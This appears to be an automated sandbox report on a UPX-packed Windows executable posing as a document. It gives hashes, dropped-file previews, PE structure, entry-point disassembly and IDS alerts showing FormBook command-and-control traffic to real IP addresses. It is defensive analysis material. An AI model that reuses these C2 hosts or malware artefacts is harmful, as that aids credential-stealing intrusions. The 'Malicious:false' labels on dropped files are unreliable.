                                                      SSDEEP:6144:m5EEXnQ9wBySivOD+qrHzFh/FrMBXugDvrwpAmNlPQ4bxQ:dwmwwCD+2TFIu55bG
                                                      MD5:80E9D5DC059060F4C5C2424774B52DB5
                                                      SHA1:822F8DDA3B47F5E2BEA4CE7A34AA2FB2E5B66C15
                                                      SHA-256:FE946066454F6A1480E6D166B864CB6D482883FFCF2A8334264515388D8D6161
                                                      SHA-512:E6EBC137CDC8A6DE9E751F9236C71C200EABBC3899089221F99AA16DC4D6BE730C22D5DC4194321906FB18768D3C31625F522F826E844DAE6552EA490EFEE884
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:.....PIIZ...L...k.FF...P]...YQLPIIZC1YEZ6TCW6FEQAX1SUNKSYQ.PIIT\.WE.?.b.7..p.0X u>9<>#-=i*;-_61zT1c%C(e8/xu..n&<=4b]DC~C1YEZ6T:V?.x1&..32.v3>.V..`#V._....7Q._...32..::9q0..ZC1YEZ6T..6F.P@X..KSYQLPII.C3XN[=TC.2FEQAX1SUN.@YQL@IIZ35YEZvTCG6FESAX7SUNKSYQJPIIZC1YE*2TCU6FEQAX3S..KSIQL@IIZC!YEJ6TCW6FUQAX1SUNKSYQLPIIZC1YEZ6TCW6FEQAX1SUNKSYQLPIIZC1YEZ6TCW6FEQAX1SUNKSYQLPIIZC1YEZ6TCW6FEQAX1SUNKSYQLPIIZC1YEZ6TCW6FEQAX1SUNKSYQLPIIZC1Yk.S,7W6F..EX1CUNK.]QL@IIZC1YEZ6TCW6FeQA81SUNKSYQLPIIZC1YEZ6TCW6FEQAX1SUNKSYQLPIIZC1YEZ6TCW6FEQAX1SUNKSYQLPIIZC1YEZ6TCW6FEQAX1SUNKSYQLPIIZC1YEZ6TCW6FEQAX1SUNKSYQLPIIZC1YEZ6TCW6FEQAX1SUNKSYQLPIIZC1YEZ6TCW6FEQAX1SUNKSYQLPIIZC1YEZ6TCW6FEQAX1SUNKSYQLPIIZC1YEZ6TCW6FEQAX1SUNKSYQLPIIZC1YEZ6TCW6FEQAX1SUNKSYQLPIIZC1YEZ6TCW6FEQAX1SUNKSYQLPIIZC1YEZ6TCW6FEQAX1SUNKSYQLPIIZC1YEZ6TCW6FEQAX1SUNKSYQLPIIZC1YEZ6TCW6FEQAX1SUNKSYQLPIIZC1YEZ6TCW6FEQAX1SUNKSYQLPIIZC1YEZ6TCW6FEQAX1SUNKSYQLPIIZC1YEZ6TCW6FEQAX1SUNKSYQLPIIZC1YEZ6TCW6FEQAX1SUNKSYQLPIIZC1YEZ6TCW6FEQAX1SUNKSYQLPIIZC1YEZ6TCW6F

                                                      C:\Users\user\AppData\Local\Temp\aut21C4.tmp

                                                      Download File
                                                      Process:C:\Users\user\Desktop\DOC092024-0431202229487.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):50472
                                                      Entropy (8bit):7.8038243115079045
                                                      Encrypted:false
                                                      SSDEEP:768:y2zzAHI/lnSPajtT8PrzeB4WObzI2SteNC/m939zwVsb2/ZmWoZvXh+HPH9EW:y2zcHeSmN8PrzS4nXStekgI22/uZJsHn
                                                      MD5:DC584487FE1E5A044F79C6E466AC804E
                                                      SHA1:861635C7A408C2BC51264B3CD065ECCDE6BBE7FE
                                                      SHA-256:5E3F308E2CF084237881C051F15334D0BB26D8A39A14A554601E87EF8E49F972
                                                      SHA-512:A38C61C75872489652F298259370C2CB43DE623A33EC0967CEEB06A86C945D5521984371686C66DD05DAEE21F7423B0FDB052E4A25EFD4577E3314DDC66323C7
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:EA06.....So.).Rk`.MlU.-..O.W.6.-..g...w...eR.R..)..a6..&..6o<.U..Y...k.I....&ae.O&....mx.V.3..Fk".W.....s4.^..9.rac._@..|.6.M.S.$.M4.Y+...b.Xj.y...Q. &..L.0..Si..9..f.ZD.8.X.S.,..e.L-`.D.a=.&..k..8.Nm.I...8.Xn.)...6.MjS....0..,.....6...D..4.Y'S.%..b.Xf.k..c0.......h.p].....qo..f..qk...6.t.3.L&S.t.0.L%....aO.W@-...U9..&.)...3.L...H..p.K..y.6mU.].....iS.Z.4y...+...S.-.....+..$..0.M..k...9..e.[..u4..s..._4..$s....dZ..)..mY.D-sJ..c9.M..*..6.X.s...s0.L+s...[6..3...4..).,.b..g.ku..0..G....E0.M.3j...9..hSYl.a.L.9...0...j..9.M-.[<..c....d.e..c.0.B..|P..y..q9....k%.ij.Wl.{5....Y..ju..a.M.Kd...TU.u....Y.Y....Rsv....F.T.Yl.k5..Q.H.T..m_.K.x.X.Ai.I..)..mU.\'5y.k}._'..5..o.Ll.4.._.].4.v.:.Pf....C0.L+.j.._8.....%.i'..l..5T.@...j...a.M.v:...|T@t...6.. .Y..s6..f.........j...@.\'.....L.M......8.L.sk..G8.Nf.....4..h.j...f...j...b.NfskL...\Y......0.M.siT..9.N-.Jt.i0.........P\.U...mz..@c....J.U&.......Nf....5...i=....K.=...8..6;..1w.^...\..6.......`..f....8..

                                                      C:\Users\user\AppData\Local\Temp\maneuverability

                                                      Download File
                                                      Process:C:\Users\user\Desktop\DOC092024-0431202229487.exe
                                                      File Type:ASCII text, with very long lines (57348), with no line terminators
                                                      Category:dropped
                                                      Size (bytes):57348
                                                      Entropy (8bit):5.747699877171752
                                                      Encrypted:false
                                                      SSDEEP:1536:Sc8ZPB/DlWDshQ5ZIpDfIemXJlyvnQUBLi6C4ezfs5zxxz:SJZpD4saTIFVM6fb9Ytz0h
                                                      MD5:68CE7E81CFCF0A7B956545CAFDCC41D0
                                                      SHA1:255EF97404F860D1400583CFDB22B48588F4D5D3
                                                      SHA-256:3D1C502A7A65D75470EB818FED779EFB0CD5B198BC531AD33B8BF619492ED07D
                                                      SHA-512:A47915BA4415E31CD6C9339FF236BF9267F01348DC5372A224673277501438FB64206C8AA42622BEE3FF6F06792ED52A33BDE895C919F9710C25A637D4CCC582
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:0MxR5T5`85bQefcO8_1medcgc[cz0n2R0J0"01065<6[5M7<bV8U6"bk0&0*0I0e0<0q6A6x8Z9?4Q5"8^4^b?946z5c0\0c0}0<0/0X6~6z8d9&4Nd_8B6^b"aP7=2R0Q0<000)0O0k6*658\9k545H8W8lbR8E6|ed0k010,0=0)0v6b6L8f9m415k8laub:9?625R080o0a0f0Y0l6-6v8(9w4pd:8$cdbra66cc10M0v0]040I0w6p6(8o9q5>5*8ke8bV8.3H3\020n0Z0D0-0>6b6O8]9&4@5*9W06b>9f3p200i0&0p0.0w0M6U6w8H9}4Sdj9G2!b+a?28ek0n0o0X0$0~0~6>6a8l9m5/5w9:4_bS8R6/4S0#0?0H0Y0k0b6`6Y8Z9k4_51926ubC9U6xcC0{090(0[0W0-6S6!8;9D4IdN9e8Hbua?6nce0x0p0l0X0"066a6R8{9{5B5-9Ta@3-3!cx0{6D6]8E9R4m5g9gcabT9L6Oe70.0s0{0D0X0C6W6+899+8&d@4j4]fWfdfdf|fvfNbea87M4l0b0O0V0}0@0{6Y6f8*9T9v5#4N6QfTfef6fmfQf#bA8d6_4/0Q0+0w0i0'026C6U8p9W8(5}4|8hfnfof1f)f=f_bw9N6]c:0A0m0M0!0B0^6Z6/8O9W8)dK4'a%fMfUfdfqfVfCbja`6kcV0_000Q0I0P0P6s658E9<965E4>c?fUf/flfRfef@bp8820eL060q0`0'000s6u6#8v958}5o4#eFf^fBfCfwfAfebN936i4g0q0f0L0p0F0\6c6*8~9>8odN540>fCf,flfwfWfsbZa'6zc%0x090+0J0T0A6=6*8X909W5U5q2|f'fjf=f/f1fZb`8e6Qc~0*0w0z0-0+0`696@859>8`555<4}fBfUflf~f3fa3;3'c19)6J6#8{9W8@df526:fWfWfDfmfGfbb5aR7@5d0r050'0D0I0T6Q6>8R9j

                                                      Static File Info

                                                      General

                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                      Entropy (8bit):7.955261164820323
                                                      TrID:
                                                      • Win32 Executable (generic) a (10002005/4) 99.39%
                                                      • UPX compressed Win32 Executable (30571/9) 0.30%
                                                      • Win32 EXE Yoda's Crypter (26571/9) 0.26%
                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                      • DOS Executable Generic (2002/1) 0.02%
                                                      File name:DOC092024-0431202229487.exe
                                                      File size:753'664 bytes
                                                      MD5:3a3b2034d8649f6112faa82e0daba310
                                                      SHA1:f3f9eb85d09171f0b92412cf5d4229d034f7417e
                                                      SHA256:e355fe9720526a9376e0557040f4d2e4eb0772a41b18c027403566500929f4e5
                                                      SHA512:063fdbb16f6c7603256b926671b04f47cc8903a7d90ed9555a440a2dcfed6c40d97e90643a31636820ca0ff6d20bfa9f79ce26670aefbb05e5319101aa56141a
                                                      SSDEEP:12288:fXe9PPlowWX0t6mOQwg1Qd15CcYk0We1FVWKXolCA8GzG1U/uS7UJkrBUobMoGyq:mhloDX0XOf4VWhXm1UWgZUCMoGyXpOkm
                                                      TLSH:46F4234954D9CCEAF36AA330D0B7CE5625667931CEC5676C9328E62DBC30303A952C6F
                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S................g..........$...............%.....H.......X.2...........q)..Z...q)......q)........\.....q)......Rich...........

                                                      File Icon

                                                      Icon Hash:aaf3e3e3938382a0

                                                      Static PE Info

                                                      General

                                                      Entrypoint:0x53b090
                                                      Entrypoint Section:UPX1
                                                      Digitally signed:false
                                                      Imagebase:0x400000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                      DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                      Time Stamp:0x66E156BE [Wed Sep 11 08:37:18 2024 UTC]
                                                      TLS Callbacks:
                                                      CLR (.Net) Version:
                                                      OS Version Major:5
                                                      OS Version Minor:1
                                                      File Version Major:5
                                                      File Version Minor:1
                                                      Subsystem Version Major:5
                                                      Subsystem Version Minor:1
                                                      Import Hash:ef471c0edf1877cd5a881a6a8bf647b9

                                                      Entrypoint Preview

                                                      Instruction
                                                      pushad
                                                      mov esi, 004E7000h
                                                      lea edi, dword ptr [esi-000E6000h]
                                                      push edi
                                                      jmp 00007F658CB496CDh
                                                      nop
                                                      mov al, byte ptr [esi]
                                                      inc esi
                                                      mov byte ptr [edi], al
                                                      inc edi
                                                      add ebx, ebx
                                                      jne 00007F658CB496C9h
                                                      mov ebx, dword ptr [esi]
                                                      sub esi, FFFFFFFCh
                                                      adc ebx, ebx
                                                      jc 00007F658CB496AFh
                                                      mov eax, 00000001h
                                                      add ebx, ebx
                                                      jne 00007F658CB496C9h
                                                      mov ebx, dword ptr [esi]
                                                      sub esi, FFFFFFFCh
                                                      adc ebx, ebx
                                                      adc eax, eax
                                                      add ebx, ebx
                                                      jnc 00007F658CB496CDh
                                                      jne 00007F658CB496EAh
                                                      mov ebx, dword ptr [esi]
                                                      sub esi, FFFFFFFCh
                                                      adc ebx, ebx
                                                      jc 00007F658CB496E1h
                                                      dec eax
                                                      add ebx, ebx
                                                      jne 00007F658CB496C9h
                                                      mov ebx, dword ptr [esi]
                                                      sub esi, FFFFFFFCh
                                                      adc ebx, ebx
                                                      adc eax, eax
                                                      jmp 00007F658CB49696h
                                                      add ebx, ebx
                                                      jne 00007F658CB496C9h
                                                      mov ebx, dword ptr [esi]
                                                      sub esi, FFFFFFFCh
                                                      adc ebx, ebx
                                                      adc ecx, ecx
                                                      jmp 00007F658CB49714h
                                                      xor ecx, ecx
                                                      sub eax, 03h
                                                      jc 00007F658CB496D3h
                                                      shl eax, 08h
                                                      mov al, byte ptr [esi]
                                                      inc esi
                                                      xor eax, FFFFFFFFh
                                                      je 00007F658CB49737h
                                                      sar eax, 1
                                                      mov ebp, eax
                                                      jmp 00007F658CB496CDh
                                                      add ebx, ebx
                                                      jne 00007F658CB496C9h
                                                      mov ebx, dword ptr [esi]
                                                      sub esi, FFFFFFFCh
                                                      adc ebx, ebx
                                                      jc 00007F658CB4968Eh
                                                      inc ecx
                                                      add ebx, ebx
                                                      jne 00007F658CB496C9h
                                                      mov ebx, dword ptr [esi]
                                                      sub esi, FFFFFFFCh
                                                      adc ebx, ebx
                                                      jc 00007F658CB49680h
                                                      add ebx, ebx
                                                      jne 00007F658CB496C9h
                                                      mov ebx, dword ptr [esi]
                                                      sub esi, FFFFFFFCh
                                                      adc ebx, ebx
                                                      adc ecx, ecx
                                                      add ebx, ebx
                                                      jnc 00007F658CB496B1h
                                                      jne 00007F658CB496CBh
                                                      mov ebx, dword ptr [esi]
                                                      sub esi, FFFFFFFCh
                                                      adc ebx, ebx
                                                      jnc 00007F658CB496A6h
                                                      add ecx, 02h
                                                      cmp ebp, FFFFFB00h
                                                      adc ecx, 02h
                                                      lea edx, dword ptr [edi+ebp]
                                                      cmp ebp, FFFFFFFCh
                                                      jbe 00007F658CB496D0h
                                                      mov al, byte ptr [edx]

                                                      Rich Headers

                                                      Programming Language:
                                                      • [ C ] VS2008 SP1 build 30729
                                                      • [IMP] VS2008 SP1 build 30729
                                                      • [ASM] VS2012 UPD4 build 61030
                                                      • [RES] VS2012 UPD4 build 61030
                                                      • [LNK] VS2012 UPD4 build 61030

                                                      Data Directories

                                                      NameVirtual AddressVirtual Size Is in Section
                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x19f3880x424.rsrc
                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x13c0000x63388.rsrc
                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x19f7ac0xc.rsrc
                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x13b2740x48UPX1
                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                      Sections

                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                      UPX00x10000xe60000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                      UPX10xe70000x550000x544007df43ae634dee9bcf570475df45448adFalse0.9884029580860534data7.936028857120389IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                      .rsrc0x13c0000x640000x6380028c4b38d84976c7ff74a073ca63cb9e9False0.9494199513190955data7.94044284150493IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                      Resources

                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                      RT_ICON0x13c5ac0x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                      RT_ICON0x13c6d80x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                      RT_ICON0x13c8040x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                      RT_ICON0x13c9300x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                      RT_ICON0x13cc1c0x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                      RT_ICON0x13cd480xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                      RT_ICON0x13dbf40x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                      RT_ICON0x13e4a00x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                      RT_ICON0x13ea0c0x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                      RT_ICON0x140fb80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                      RT_ICON0x1420640x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                      RT_MENU0xca4a00x50emptyEnglishGreat Britain0
                                                      RT_STRING0xca4f00x594emptyEnglishGreat Britain0
                                                      RT_STRING0xcaa840x68aemptyEnglishGreat Britain0
                                                      RT_STRING0xcb1100x490emptyEnglishGreat Britain0
                                                      RT_STRING0xcb5a00x5fcemptyEnglishGreat Britain0
                                                      RT_STRING0xcbb9c0x65cemptyEnglishGreat Britain0
                                                      RT_STRING0xcc1f80x466emptyEnglishGreat Britain0
                                                      RT_STRING0xcc6600x158emptyEnglishGreat Britain0
                                                      RT_RCDATA0x1424d00x5c95edata1.0003322521952378
                                                      RT_GROUP_ICON0x19ee340x76dataEnglishGreat Britain0.6610169491525424
                                                      RT_GROUP_ICON0x19eeb00x14dataEnglishGreat Britain1.25
                                                      RT_GROUP_ICON0x19eec80x14dataEnglishGreat Britain1.15
                                                      RT_GROUP_ICON0x19eee00x14dataEnglishGreat Britain1.25
                                                      RT_VERSION0x19eef80xdcdataEnglishGreat Britain0.6181818181818182
                                                      RT_MANIFEST0x19efd80x3b0ASCII text, with CRLF line terminatorsEnglishGreat Britain0.5116525423728814

                                                      Imports

                                                      DLLImport
                                                      KERNEL32.DLLLoadLibraryA, GetProcAddress, VirtualProtect, VirtualAlloc, VirtualFree, ExitProcess
                                                      ADVAPI32.dllAddAce
                                                      COMCTL32.dllImageList_Remove
                                                      COMDLG32.dllGetSaveFileNameW
                                                      GDI32.dllLineTo
                                                      IPHLPAPI.DLLIcmpSendEcho
                                                      MPR.dllWNetUseConnectionW
                                                      ole32.dllCoGetObject
                                                      OLEAUT32.dllVariantInit
                                                      PSAPI.DLLGetProcessMemoryInfo
                                                      SHELL32.dllDragFinish
                                                      USER32.dllGetDC
                                                      USERENV.dllLoadUserProfileW
                                                      UxTheme.dllIsThemeActive
                                                      VERSION.dllVerQueryValueW
                                                      WININET.dllFtpOpenFileW
                                                      WINMM.dlltimeGetTime
                                                      WSOCK32.dllsocket

                                                      Possible Origin

                                                      Language of compilation systemCountry where language is spokenMap
                                                      EnglishGreat Britain

                                                      Network Behavior

                                                      Suricata IDS Alerts

                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                      2024-09-11T11:17:25.129349+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.44973681.88.63.4680TCP
                                                      2024-09-11T11:17:25.129349+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.44973681.88.63.4680TCP
                                                      2024-09-11T11:17:40.860929+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.463317217.70.184.5080TCP
                                                      2024-09-11T11:17:44.027833+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.463318217.70.184.5080TCP
                                                      2024-09-11T11:17:46.566841+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.463319217.70.184.5080TCP
                                                      2024-09-11T11:17:49.106206+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.463320217.70.184.5080TCP
                                                      2024-09-11T11:17:49.106206+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.463320217.70.184.5080TCP
                                                      2024-09-11T11:17:55.140962+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.463321172.96.187.6080TCP
                                                      2024-09-11T11:17:57.660795+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.463322172.96.187.6080TCP
                                                      2024-09-11T11:18:00.220299+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.463323172.96.187.6080TCP
                                                      2024-09-11T11:18:02.763625+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.463324172.96.187.6080TCP
                                                      2024-09-11T11:18:02.763625+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.463324172.96.187.6080TCP
                                                      2024-09-11T11:18:08.258289+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4633253.33.130.19080TCP
                                                      2024-09-11T11:18:11.092973+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4633263.33.130.19080TCP
                                                      2024-09-11T11:18:13.362343+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4633273.33.130.19080TCP
                                                      2024-09-11T11:18:15.905254+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.4633283.33.130.19080TCP
                                                      2024-09-11T11:18:15.905254+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.4633283.33.130.19080TCP
                                                      2024-09-11T11:18:22.311407+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.46332967.223.117.18980TCP
                                                      2024-09-11T11:18:24.239922+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.46333067.223.117.18980TCP
                                                      2024-09-11T11:18:26.797160+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.46333167.223.117.18980TCP
                                                      2024-09-11T11:18:29.322120+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.46333267.223.117.18980TCP
                                                      2024-09-11T11:18:29.322120+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.46333267.223.117.18980TCP
                                                      2024-09-11T11:18:36.081007+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.463333147.92.40.17580TCP
                                                      2024-09-11T11:18:38.649480+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.463334147.92.40.17580TCP
                                                      2024-09-11T11:18:41.246867+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.463335147.92.40.17580TCP
                                                      2024-09-11T11:18:43.806174+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.463336147.92.40.17580TCP
                                                      2024-09-11T11:18:43.806174+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.463336147.92.40.17580TCP
                                                      2024-09-11T11:18:49.314259+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4633373.33.130.19080TCP
                                                      2024-09-11T11:18:51.857060+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4633383.33.130.19080TCP
                                                      2024-09-11T11:18:54.378506+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4633393.33.130.19080TCP
                                                      2024-09-11T11:18:56.954242+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.4633403.33.130.19080TCP
                                                      2024-09-11T11:18:56.954242+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.4633403.33.130.19080TCP
                                                      2024-09-11T11:19:02.451571+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4633413.33.130.19080TCP
                                                      2024-09-11T11:19:05.018538+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4633423.33.130.19080TCP
                                                      2024-09-11T11:19:07.563352+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4633433.33.130.19080TCP
                                                      2024-09-11T11:19:10.107614+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.4633443.33.130.19080TCP
                                                      2024-09-11T11:19:10.107614+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.4633443.33.130.19080TCP
                                                      2024-09-11T11:19:15.625649+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4633453.33.130.19080TCP
                                                      2024-09-11T11:19:18.187779+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4633463.33.130.19080TCP
                                                      2024-09-11T11:19:20.725939+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4633473.33.130.19080TCP
                                                      2024-09-11T11:19:23.495580+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.4633483.33.130.19080TCP
                                                      2024-09-11T11:19:23.495580+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.4633483.33.130.19080TCP
                                                      2024-09-11T11:19:29.857744+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.46334985.153.138.11380TCP
                                                      2024-09-11T11:19:32.000620+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.46335085.153.138.11380TCP
                                                      2024-09-11T11:19:34.680405+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.46335185.153.138.11380TCP
                                                      2024-09-11T11:19:37.159361+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.46335285.153.138.11380TCP
                                                      2024-09-11T11:19:37.159361+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.46335285.153.138.11380TCP
                                                      2024-09-11T11:19:43.318591+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.463353104.21.11.3180TCP
                                                      2024-09-11T11:19:45.853997+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.463354104.21.11.3180TCP
                                                      2024-09-11T11:19:48.378230+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.463355104.21.11.3180TCP
                                                      2024-09-11T11:19:50.920421+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.463356104.21.11.3180TCP
                                                      2024-09-11T11:19:50.920421+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.463356104.21.11.3180TCP
                                                      2024-09-11T11:19:56.435701+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.463357188.114.97.380TCP
                                                      2024-09-11T11:19:58.982043+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.463358188.114.97.380TCP
                                                      2024-09-11T11:20:01.547658+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.463359188.114.97.380TCP
                                                      2024-09-11T11:20:04.080886+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.463360188.114.97.380TCP
                                                      2024-09-11T11:20:04.080886+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.463360188.114.97.380TCP
                                                      2024-09-11T11:20:10.230010+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4633613.33.130.19080TCP
                                                      2024-09-11T11:20:12.762486+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4633623.33.130.19080TCP
                                                      2024-09-11T11:20:15.332520+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4633633.33.130.19080TCP
                                                      2024-09-11T11:20:17.882453+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.4633643.33.130.19080TCP
                                                      2024-09-11T11:20:17.882453+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.4633643.33.130.19080TCP
                                                      2024-09-11T11:20:24.194165+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.463365206.119.82.13480TCP
                                                      2024-09-11T11:20:27.186100+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.463366206.119.82.13480TCP
                                                      2024-09-11T11:20:29.762687+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.463367206.119.82.13480TCP
                                                      2024-09-11T11:20:32.268339+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.463368206.119.82.13480TCP
                                                      2024-09-11T11:20:32.268339+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.463368206.119.82.13480TCP
                                                      2024-09-11T11:20:38.047407+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.46336965.21.196.9080TCP
                                                      2024-09-11T11:20:40.715590+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.46337065.21.196.9080TCP
                                                      2024-09-11T11:20:43.199036+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.46337165.21.196.9080TCP
                                                      2024-09-11T11:20:45.747099+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.46337265.21.196.9080TCP
                                                      2024-09-11T11:20:45.747099+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.46337265.21.196.9080TCP
                                                      2024-09-11T11:20:53.091857+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.46337338.181.141.12280TCP
                                                      2024-09-11T11:20:55.058547+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.46337438.181.141.12280TCP
                                                      2024-09-11T11:20:57.935818+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.46337538.181.141.12280TCP
                                                      2024-09-11T11:21:00.793822+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.46337638.181.141.12280TCP
